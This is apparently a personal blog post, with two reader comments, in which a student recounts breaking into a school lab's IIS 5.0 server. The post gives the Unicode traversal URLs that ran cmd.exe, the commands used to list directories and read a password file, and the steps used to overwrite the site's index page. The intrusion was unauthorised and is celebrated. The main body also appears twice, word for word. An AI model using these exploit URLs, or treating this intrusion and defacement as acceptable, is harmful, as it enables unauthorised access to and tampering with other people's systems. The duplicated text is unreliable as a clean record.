Hit and Run
Ok, here's what happened. First thing hackers always do is enumerate. Wat this means is to find out what the target is all about. I knew the server was running a web and ftp server. These are the important things I found out:
220 chan-lanlab2 Microsoft FTP Service (Version 5.0).
and
Server: Microsoft-IIS/5.0
Date: Tue, 15 Dec 2004 03:12:52 GMT
Content-Type: text/html
Content-Length: 87
So, the server was running Windows NT and/or 2000, or so I guessed =]. There was no way for me to tell what service pack the server was running so I had no choice but to trial and error. I tried a unicode hack:
http://chan-lanlab2/..%255c../winnt/system32/cmd.exe?/c+dir
a well known hack where IIS will change the "%255c" into "/" and properly execute the URL. If the website was hosted on the default location, ie C:\Inetpub\wwwroot\ then this URL will effectively execute C:\winnt\system32\cmd.exe and run the command dir, listing the current folder. The directory would be the website's folder.
And... voila!
Directory of C:\Lab02
...
05/11/2004 02:58p 4,786 index.htm
11/29/2004 05:17p <DIR> Lab
12/16/2004 06:07p 1,337 printenv.cgi
06/24/2004 01:20p 33 pwd
11/29/2004 02:20p <DIR> Temp
11/29/2004 02:20p <DIR> Tute
06/24/2004 01:29p 1,295 upload.cgi
06/24/2004 01:17p 945 upload.htm
...
With cmd.exe access I could execute any DOS command I want, straight from the browser! Whoa! A pwd file! I quickly put this into the URL:
http://chan-lanlab2/..%255c../winnt/system32/cmd.exe?/c+type+pwd
which will type out the contents of the pwd file and got:
v¦ªx£e>(¦mí±a@>D ?¦+?O+pKê?W¦¦µ`4
Shit some encrypted username and password. Viewing the upload.cgi file, dunno what language but seemed it was using AES so I dun think I can bruteforce this. Sianz thot I could use his upload form to put my stuff inside. Then it hit me, maybe the FTP server (u know lah, we can upload our assignments there) puts the files into somewhere in this folder? Listing the Temp folder confirmed my guess! It contained folders of all the PC # accounts:
Directory of C:\Lab02\Temp
...
11/29/2004 02:21p PC01
11/29/2004 02:21p PC02
...
So... I quickly FTP'ed a modified copy of the index.htm (with the Hacks logo img tag lah) and hacks.gif using my PC in the lab (PC11). Issuing a copy URL command into the browser I copied the files from the PC11 folder over to C:\lab02 and overwrote the original index.htm!!! Success!!
Cookie for me? =]
220 chan-lanlab2 Microsoft FTP Service (Version 5.0).
and
Server: Microsoft-IIS/5.0
Date: Tue, 15 Dec 2004 03:12:52 GMT
Content-Type: text/html
Content-Length: 87
So, the server was running Windows NT and/or 2000, or so I guessed =]. There was no way for me to tell what service pack the server was running so I had no choice but to trial and error. I tried a unicode hack:
http://chan-lanlab2/..%255c../winnt/system32/cmd.exe?/c+dir
a well known hack where IIS will change the "%255c" into "/" and properly execute the URL. If the website was hosted on the default location, ie C:\Inetpub\wwwroot\ then this URL will effectively execute C:\winnt\system32\cmd.exe and run the command dir, listing the current folder. The directory would be the website's folder.
And... voila!
Directory of C:\Lab02
...
05/11/2004 02:58p 4,786 index.htm
11/29/2004 05:17p <DIR> Lab
12/16/2004 06:07p 1,337 printenv.cgi
06/24/2004 01:20p 33 pwd
11/29/2004 02:20p <DIR> Temp
11/29/2004 02:20p <DIR> Tute
06/24/2004 01:29p 1,295 upload.cgi
06/24/2004 01:17p 945 upload.htm
...
With cmd.exe access I could execute any DOS command I want, straight from the browser! Whoa! A pwd file! I quickly put this into the URL:
http://chan-lanlab2/..%255c../winnt/system32/cmd.exe?/c+type+pwd
which will type out the contents of the pwd file and got:
v¦ªx£e>(¦mí±a@>D ?¦+?O+pKê?W¦¦µ`4
Shit some encrypted username and password. Viewing the upload.cgi file, dunno what language but seemed it was using AES so I dun think I can bruteforce this. Sianz thot I could use his upload form to put my stuff inside. Then it hit me, maybe the FTP server (u know lah, we can upload our assignments there) puts the files into somewhere in this folder? Listing the Temp folder confirmed my guess! It contained folders of all the PC # accounts:
Directory of C:\Lab02\Temp
...
11/29/2004 02:21p PC01
11/29/2004 02:21p PC02
...
So... I quickly FTP'ed a modified copy of the index.htm (with the Hacks logo img tag lah) and hacks.gif using my PC in the lab (PC11). Issuing a copy URL command into the browser I copied the files from the PC11 folder over to C:\lab02 and overwrote the original index.htm!!! Success!!
Cookie for me? =]
posted by trinity374 at 5:35 PM
2 Comments:
Well done lah! Too bad I not in lab now, can't see the page LOL!! You got take screenshot anot?
Got! But using mobile leh. Next time show you lor, coz I change the index page back to orig liao. Leave there too long later I kenna then jialat!
Post a Comment
<< Home